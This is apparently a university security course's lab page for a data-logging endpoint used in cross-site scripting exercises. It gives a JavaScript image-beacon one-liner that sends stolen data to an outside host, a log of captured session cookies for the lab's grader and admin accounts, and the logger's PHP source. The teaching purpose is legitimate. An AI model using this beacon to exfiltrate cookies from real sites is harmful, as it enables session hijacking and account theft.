You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.566/2024/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Thu, 27 Nov 2025 03:32:24 +0000: student-vm: PyZoobarLogin=User2#5deb7bd681a6ca0aeaac6e84b6f0fe251dc13b865c76b05feb33e36c75bb13f3 Sun, 23 Nov 2025 17:43:03 +0000: student-ex8: grader/ZOWBWEVKGPOM Sun, 23 Nov 2025 17:42:57 +0000: student-ex8: grader/SQCRGLXJOYRA Sun, 23 Nov 2025 17:42:38 +0000: student-ex5: PyZoobarLogin=grader#1b9325f8009f75974f431b6e4140f50023c90fb69a72d6f4cf2660e3841bc36c Sun, 23 Nov 2025 17:42:32 +0000: student-ex4: PyZoobarLogin=grader#9ef9a697df647f1ac5ceefe9dfcc833f878a6c8d993be203909c648a73a6dd53 Sun, 23 Nov 2025 17:42:21 +0000: student-lab4: PyZoobarLogin=grader#d40a82d8eb3333802d4ba0d763f24f21a6bfc6fbdb4ea5a6ca65dda5e15a23f1 Sun, 23 Nov 2025 17:31:56 +0000: student-ex8: grader/HCBEOYZAOQTW Sun, 23 Nov 2025 17:31:50 +0000: student-ex8: grader/XSRKCCQMINYS Sun, 23 Nov 2025 17:31:32 +0000: student-ex5: PyZoobarLogin=grader#c016f877c9806b33ff6fdf94ce194dbd19bf508cd6267942790fca33aedfe736 Sun, 23 Nov 2025 17:31:26 +0000: student-ex4: PyZoobarLogin=grader#85b127a02d974d810ab5f97d666c4a87e5a2dd0ad6161e8c0f2e90777e6560e7 Sun, 23 Nov 2025 17:31:14 +0000: student-lab4: PyZoobarLogin=grader#9b1668e3ea4c485cb94c0d101a63cce8c65517597d71ca9490f3f40939b4b3a0 Sun, 23 Nov 2025 17:26:32 +0000: student-ex8: grader/TWNSILJXAWXS Sun, 23 Nov 2025 17:26:13 +0000: student-ex5: PyZoobarLogin=grader#339085f0256be58ab4f2c8b3c1c800a4f2067a771f5e963346b4ba3b6544c35f Sun, 23 Nov 2025 17:26:06 +0000: student-ex4: PyZoobarLogin=grader#5ade355fc0aa3299538715c5182f25c2070f42f2e6f21ec194f8fec8e288323e Sun, 23 Nov 2025 17:25:52 +0000: student-lab4: PyZoobarLogin=grader#dbaabbec58bea588855c2443fe19bbec1797c612bf78a5980798fb001e1a29c0 Sun, 23 Nov 2025 17:22:33 +0000: student-ex8: grader:BSDBJUXOXGFZ Sun, 23 Nov 2025 17:22:15 +0000: student-ex5: PyZoobarLogin=grader#e46bce23f05a46eac5c5dd1f0a6f765e668d4e14823573b12b19fbf03af6a12a Sun, 23 Nov 2025 17:22:09 +0000: student-ex4: PyZoobarLogin=grader#a0e6ffbc7afaff8c08f44655cf399ddc3fb011b9d1c449f58ef143d95b8ba14a Sun, 23 Nov 2025 17:21:57 +0000: student-lab4: PyZoobarLogin=grader#77c93b91d2aad06c52ebb5c639f990800b01d33e0283a034d58cd17a7c35300a Sun, 23 Nov 2025 17:18:06 +0000: student-ex5: PyZoobarLogin=grader#1833bcddbb255abb4e3c8b877f2bb38c0b8f656bb48e206c6b5fdd9d8ebd76f8 Sun, 23 Nov 2025 17:18:00 +0000: student-ex4: PyZoobarLogin=grader#6cbf8202374b19ca133a9fb95430bfc0da085fe98c7a380dfdb716d2d44bac95 Sun, 23 Nov 2025 17:17:48 +0000: student-lab4: PyZoobarLogin=grader#083a5785458a302bb86297ae85f3bda8548d7dac34e604fd95d6b443ca286b64 Sun, 23 Nov 2025 17:13:09 +0000: student-ex5: PyZoobarLogin=grader#7a346b2a4467dd52bedf1a7152a822aed7509fe88adb7211b8691c89364fc3b4 Sun, 23 Nov 2025 17:13:03 +0000: student-ex4: PyZoobarLogin=grader#ba85c50b1ba42d53a5d241d2475da68f7dbcc4d28c0338c6572975a37dbbf93c Sun, 23 Nov 2025 17:12:51 +0000: student-lab4: PyZoobarLogin=grader#1b3a59fde993d165ed63cfaf98493e44af45681ff22144f1927b2b7a48394b31 Sun, 23 Nov 2025 17:08:13 +0000: student-ex5: PyZoobarLogin=111#bbde9e11ab8f8c22cd9942aa64a431f763e40db59a3ce2271f361ebdc9749a6e Sun, 23 Nov 2025 16:55:58 +0000: student-ex5: PyZoobarLogin=111#bbde9e11ab8f8c22cd9942aa64a431f763e40db59a3ce2271f361ebdc9749a6e Sun, 23 Nov 2025 16:53:47 +0000: student-ex5: PyZoobarLogin=111#bbde9e11ab8f8c22cd9942aa64a431f763e40db59a3ce2271f361ebdc9749a6e Sun, 23 Nov 2025 16:46:57 +0000: student-ex5: PyZoobarLogin=grader#7b0efcc249bc2ce5e17cb6df3fdca10bd890cf52669f45503e6671fc549bcffd Sun, 23 Nov 2025 16:46:51 +0000: student-ex4: PyZoobarLogin=grader#8e7e474bdae05f70a5177bdbdb8ea313c42b43a72926cd5f6b72751339e0ccad Sun, 23 Nov 2025 16:46:38 +0000: student-lab4: PyZoobarLogin=grader#a9a8e1354ef6ed7fb9dd527f90eda8e1b9037ffee7e3bffb3d4f9d91363ee2ab Sun, 23 Nov 2025 16:39:44 +0000: student-ex5: PyZoobarLogin=111#cd1fa6be76db6ef92cacc4210bc59215194a8a05bd25a538b876df026854d21a Sun, 23 Nov 2025 16:39:36 +0000: student-ex5: PyZoobarLogin=111#cd1fa6be76db6ef92cacc4210bc59215194a8a05bd25a538b876df026854d21a Sun, 23 Nov 2025 16:38:24 +0000: student-ex5: PyZoobarLogin=grader#7ed6c674ea87d143e3ff6e2e9ed8c2746d400d71fa0ee6474d66e4814f5282fa Sun, 23 Nov 2025 16:38:19 +0000: student-ex4: PyZoobarLogin=grader#231eedcf1e3e0f5d6e01c13f219363899c992c6968f74cb7362eb01714e64aec Sun, 23 Nov 2025 16:38:07 +0000: student-lab4: PyZoobarLogin=grader#f8debab336a5b3b29b360f250420ab02e671eeda738749055592b0e51a5cec80 Sun, 23 Nov 2025 16:36:56 +0000: student-ex5: PyZoobarLogin=grader#c499e39ce2bfd5f6d0c6153ae1f1ab849d5409942de66b561ab2818514f20d3e Sun, 23 Nov 2025 16:36:50 +0000: student-ex4: PyZoobarLogin=grader#705b9ddc2ed1dde6efc7ff05ee6cba2cb87cc5604100ecbcbd08823d7d24256f Sun, 23 Nov 2025 16:36:39 +0000: student-lab4: PyZoobarLogin=grader#7d1e3e9f300da0e45b6a39a1501f22d4b93ad8b9339e36681387d64067d2bcb3 Sun, 23 Nov 2025 16:35:18 +0000: student-ex5: PyZoobarLogin=111#857f52849d3882aec97deffb603462b52dda31f65162f9f39127d279f8d84752 Sun, 23 Nov 2025 16:35:08 +0000: student-ex5: PyZoobarLogin=111#857f52849d3882aec97deffb603462b52dda31f65162f9f39127d279f8d84752 Fri, 21 Nov 2025 08:26:10 +0000: attacker: grader/DYLETNNLLGVE Fri, 21 Nov 2025 08:26:02 +0000: attacker: grader/DDHJVYJYFLOI Fri, 21 Nov 2025 08:25:06 +0000: attacker: grader/AGSPOJBECYTZ Fri, 21 Nov 2025 08:24:58 +0000: attacker: grader/JGERTYWTYGZG Fri, 21 Nov 2025 08:04:50 +0000: attacker: grader/CRPPRHBSGEJY Fri, 21 Nov 2025 08:04:43 +0000: attacker: grader/MQTSDPMPUTKX Fri, 21 Nov 2025 08:02:48 +0000: attacker: grader/KMNITNNDWYDQ Fri, 21 Nov 2025 07:58:20 +0000: HatsuneMiku: PyZoobarLogin=grader#4eeaeadd192ee396881e5b31747b6e9886703dd8f4efbcce2134533fc35d5306 Fri, 21 Nov 2025 07:58:12 +0000: HatsuneMiku: PyZoobarLogin=grader#3005c1d801df608d96e49bdf07ef8766d3139c77ab75b483b8bb4e631edbbf30 Fri, 21 Nov 2025 07:57:58 +0000: HatsuneMiku: PyZoobarLogin=grader#274d98b7d4231f15745303f9dff025c4b85b85e45efefb18ebe6e422f662824d Fri, 21 Nov 2025 07:54:38 +0000: HatsuneMiku: PyZoobarLogin=grader#fa2666e247bd9b3655ba927c7cf95bad9fd05aa95462a1a52d29a9e5de7fb74d Fri, 21 Nov 2025 07:54:30 +0000: HatsuneMiku: PyZoobarLogin=grader#d40ace83b3416361814b5fb803b3626cb4dc4febe6174b6fb938fe88e7905517 Fri, 21 Nov 2025 07:54:15 +0000: HatsuneMiku: PyZoobarLogin=grader#efbd61a6753704fda5fc7356ac953f50b21fca2d9044e6e26e32f48b28022d5e Fri, 21 Nov 2025 07:52:13 +0000: HatsuneMiku: PyZoobarLogin=grader#2f8c7ca95a057ad7d85454967ee3502e87429dbe432b5a174384c4a92f91013f Fri, 21 Nov 2025 07:52:05 +0000: HatsuneMiku: PyZoobarLogin=grader#ade9d2caf6d5d81862b2ed7a4a255ac4051fa8d94e486c4429777f0dbb5d6002 Fri, 21 Nov 2025 07:51:51 +0000: HatsuneMiku: PyZoobarLogin=grader#e99a16a3e933aaa701025655e099b2b54dc283f3017e2516666f595b47f6d163 Fri, 21 Nov 2025 07:51:02 +0000: zjy: grader/MIETHYTENAQV Fri, 21 Nov 2025 07:50:52 +0000: zjy: grader/MHCUIQWNFMSB Fri, 21 Nov 2025 07:50:16 +0000: zjy: PyZoobarLogin=grader#2af30d89c79359397e2d43035f9c350eda0fa7b8e13efc13489a0c29f6c68d3d Fri, 21 Nov 2025 07:50:06 +0000: zjy: PyZoobarLogin=grader#9cc10d186e35f75edd85d81c0c6c8fa5186a1a41739c2e450b4702428c0ddceb Fri, 21 Nov 2025 07:49:43 +0000: testing: grader#9e021c2a2e9712b91c9b5525aa1c40338c10645b291897601f5caffa2e2ea3e6 Fri, 21 Nov 2025 07:46:53 +0000: zjy: grader/DUQETTRUOHFQ Fri, 21 Nov 2025 07:46:41 +0000: zjy: grader/ULYVNZCSCREG Fri, 21 Nov 2025 07:46:04 +0000: zjy: PyZoobarLogin=grader#846eaacba961814aaa6f0ad5a6d78c7aa3cddac3e2be4b2f86fe0dfdec549e6e Fri, 21 Nov 2025 07:45:53 +0000: zjy: PyZoobarLogin=grader#b9adc007b30f7d01804428dd8f4cce7af5b21b99e2eaae2404d5e86f192ef1dd Fri, 21 Nov 2025 07:45:32 +0000: testing: grader#483eca7be37de1d39704cb431f46e3a7c398c1a918291648af3bd1dd0b5531cd Fri, 21 Nov 2025 07:41:09 +0000: HatsuneMiku: PyZoobarLogin=grader#770396282b801b3494cd6aaf8a690c4b817c094fa2317d925eebb0f5ceb758e8 Fri, 21 Nov 2025 07:41:01 +0000: HatsuneMiku: PyZoobarLogin=grader#b4ca31e2af63ac283a469a0e44d6dcb25080ee51631765ff36c56abad0000473 Fri, 21 Nov 2025 07:40:46 +0000: HatsuneMiku: PyZoobarLogin=grader#2c87d1f2f1a99716dad2fe16c6f21fcba709dabed24d41db42c75bfc5af8609b Fri, 21 Nov 2025 07:40:04 +0000: HatsuneMiku: sidebar_state=false; PyZoobarLogin=admin#d189c573b775da1de7dcfe17f252127e53164834ad0ebf05f8eb3df345e9faed Fri, 21 Nov 2025 07:36:38 +0000: HatsuneMiku: PyZoobarLogin=grader#7809041dc493fe830ead6e7cca067a264d225352de9d717ccf6a48cf042b7650 Fri, 21 Nov 2025 07:36:31 +0000: HatsuneMiku: PyZoobarLogin=grader#b449c4a4358c7f95a1ba904d83f47d3195e3c63c082bbb3b12eba7fe86b98d92 Fri, 21 Nov 2025 07:36:16 +0000: HatsuneMiku: PyZoobarLogin=grader#d3911fda548fca44475955774708a2816c2edc2fabcbd94b57c238e3550c4603 Fri, 21 Nov 2025 07:35:34 +0000: HatsuneMiku: sidebar_state=false; PyZoobarLogin=admin#e8f213664b6119058ac572956fee4616bcd5346eaf9e071c7cf1e2a8b3063fa0 Fri, 21 Nov 2025 07:29:34 +0000: HatsuneMiku: sidebar_state=false; PyZoobarLogin=admin#e8f213664b6119058ac572956fee4616bcd5346eaf9e071c7cf1e2a8b3063fa0 Fri, 21 Nov 2025 07:28:37 +0000: HatsuneMiku: PyZoobarLogin=grader#39ea75aafa85f90544cddaec6f91465adff79739a09444e03f589806a0ac4b86 Fri, 21 Nov 2025 07:28:30 +0000: HatsuneMiku: PyZoobarLogin=grader#e72bf03232be4e250734cc9c73ed5b5590ddc92a2ca48d1a435f1eca6fce9eab Fri, 21 Nov 2025 07:28:13 +0000: HatsuneMiku: PyZoobarLogin=grader#bdabe7b8500875707734603169dd3e757ad61bb350c4be5c01c50bc48a0876e7 Fri, 21 Nov 2025 07:26:56 +0000: HatsuneMiku: PyZoobarLogin=grader#aa8c144a2c0f2d8b4b7fbfa3043565d24d9ca0476ebdc490a75a2995ba1498d2 Fri, 21 Nov 2025 07:26:49 +0000: HatsuneMiku: PyZoobarLogin=grader#7de52233f896b8fce8ae18e039f58fdccdb58d6cc73f8bd6947915b1b4bb4f81 Fri, 21 Nov 2025 07:26:36 +0000: HatsuneMiku: PyZoobarLogin=grader#a730ddc1d686497ea1f2350917c3d56f4fde2a11ca9de45ebf4cf934fba3f894 Fri, 21 Nov 2025 07:25:53 +0000: HatsuneMiku: sidebar_state=false; PyZoobarLogin=admin#f0dbfcf3bc74e150f34e5dbd3b95a166319a73a72a923a7c7614fc961438be73 Fri, 21 Nov 2025 07:25:51 +0000: student-vm: grader/HYQEZEHUECAX Fri, 21 Nov 2025 07:25:43 +0000: must: grader/PSDCIKQHLFZL Fri, 21 Nov 2025 07:25:12 +0000: must: PyZoobarLogin=grader#a9d66b1abba4d8a45758adba0d75140a1b0bfcd07a3c6a6b84d8714a78319ade Fri, 21 Nov 2025 07:25:04 +0000: must: PyZoobarLogin=grader#af6c47960b921c6496678867595ee3abae42f5ea4e8a575042f427d2ee44570c Fri, 21 Nov 2025 07:24:48 +0000: must: PyZoobarLogin=grader#d1c553aeb7166f153ee09c83849c9f92dac2ea381cb056428828b911339785fc Fri, 21 Nov 2025 07:17:53 +0000: HatsuneMiku: sidebar_state=false; PyZoobarLogin=admin#f0dbfcf3bc74e150f34e5dbd3b95a166319a73a72a923a7c7614fc961438be73 Fri, 21 Nov 2025 07:17:31 +0000: HatsuneMiku: sidebar_state=false; PyZoobarLogin=admin#f0dbfcf3bc74e150f34e5dbd3b95a166319a73a72a923a7c7614fc961438be73 Fri, 21 Nov 2025 07:15:35 +0000: HatsuneMiku: sidebar_state=false; PyZoobarLogin=admin#f0dbfcf3bc74e150f34e5dbd3b95a166319a73a72a923a7c7614fc961438be73 Fri, 21 Nov 2025 07:13:57 +0000: HatsuneMiku: sidebar_state=false; PyZoobarLogin=admin#f0dbfcf3bc74e150f34e5dbd3b95a166319a73a72a923a7c7614fc961438be73 Fri, 21 Nov 2025 07:09:26 +0000: student: sidebar_state=false; PyZoobarLogin=admin#f0dbfcf3bc74e150f34e5dbd3b95a166319a73a72a923a7c7614fc961438be73 Fri, 21 Nov 2025 07:00:01 +0000: student: PyZoobarLogin=grader#14f1994b3cdd5c21e5adefa3f34506d8ac71ca7308a310f0faea27d09a28894e Fri, 21 Nov 2025 06:59:54 +0000: HatsuneMiku: PyZoobarLogin=grader#25670af669b443091ab26c5273dc42acb45f078323ca14963c2fcd38a50abc2a Fri, 21 Nov 2025 06:59:39 +0000: HatsuneMiku: PyZoobarLogin=grader#496428844a2f5f3948193220225bdbb95893f85b2cac7731ab4cf439ed1a7f68 Fri, 21 Nov 2025 06:57:54 +0000: student: PyZoobarLogin=grader#1a696e4aa4213b776940dab08ff6c341a6579d301734736a40649a55630d3e07 Fri, 21 Nov 2025 06:57:47 +0000: HatsuneMiku: PyZoobarLogin=grader#f17b7114021e66af727bb0d28cef31d055791b8137adb018d52a900789137964 Fri, 21 Nov 2025 06:57:33 +0000: HatsuneMiku: PyZoobarLogin=grader#16d77c289f1c8c673fb8c5153c94201785ea89bac0b359dad1a8a0c5614a428c Fri, 21 Nov 2025 06:56:17 +0000: student: PyZoobarLogin=grader#c8459828376f12de3fc3047319d5c445e533ce0c422af62152cdd0a9703ee413 Fri, 21 Nov 2025 06:56:10 +0000: HatsuneMiku: PyZoobarLogin=grader#6947551a995635be8b7ca61d92e0fc3696266b0de1a4c4c1a84c9b192d0adbea
In case you are curious, here is the source code of this page.
<?php header("Access-Control-Allow-Origin: *"); do { if (!array_key_exists("id", $_REQUEST)) { break; } $id = $_REQUEST['id']; if (strlen($id) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "ID value is larger than 1000 bytes"; return; } if (!array_key_exists("payload", $_REQUEST)) { header("HTTP/1.0 400 Bad Request"); echo "No payload given"; return; } $payload = $_REQUEST['payload']; if (empty($payload)) { header("HTTP/1.0 400 Bad Request"); echo "Empty payload given"; return; } if (strlen($payload) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "Payload is larger than 1000 bytes"; return; } if (!function_exists('apcu_add')) { header("HTTP/1.0 501 Not Implemented"); echo "APCu not enabled, so no rate limiting; refusing all requests"; return; } if (apcu_add($payload, true, 5) === false) { // exact same $payload was sent in the past 5 seconds header("HTTP/1.0 429 Too Many Requests"); echo "That exact payload was sent very recently; rejecting"; return; } $payload = str_replace(array("\n", "\r"), '.', $payload); $id = str_replace(array("\n", "\r"), '.', $id); $file = fopen("/tmp/6.566-2024-logger.txt", "c+"); if ($file === false) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to open log file"; return; } if (!flock($file, LOCK_EX)) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to lock log file"; return; } $lines = array(); while (!feof($file) && count($lines) < 100) { $lines[] = fgets($file); } ftruncate($file, 0); rewind($file); fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n"); foreach ($lines as &$line) { fwrite($file, $line); } flock($file, LOCK_UN); fclose($file); echo "Logged!"; return; } while(0); $link = "(new Image()).src=" . "'https://css.csail.mit.edu/6.566/2024/labs/log.php?'" . " + 'id=my-username'" . " + '&payload=some-string' + '&random='" . " + Math.random()"; ?><!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab 4 Logging Script</title> </head> <body> <h1>Lab 4 Logging Script</h1> <p> You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: </p> <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre> <p> The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>. </p> <h2>Test form</h2> <p> If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.) </p> <form method="GET" action=""> <label for="id">ID:</label><br /> <input name="id" placeholder="your-mit-username" size="40" /> <i>(some identifier to locate your payload in the log)</i> <br /> <br /> <label for="payload">Payload:</label><br /> <input name="payload" placeholder="some-string" size="40" /> <i>(the information you stole)</i> <br /> <input type="submit" value="Log" name="log_submit" /> </form> <h2>Logged entries</h2> <p> Below are the most recent logged entries, so that you can check if your attack worked: </p> <pre class="tty"><?php $lines = file_get_contents("/tmp/6.566-2024-logger.txt"); echo htmlspecialchars($lines); ?></pre> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php highlight_file(__FILE__); ?></pre> </body> </html>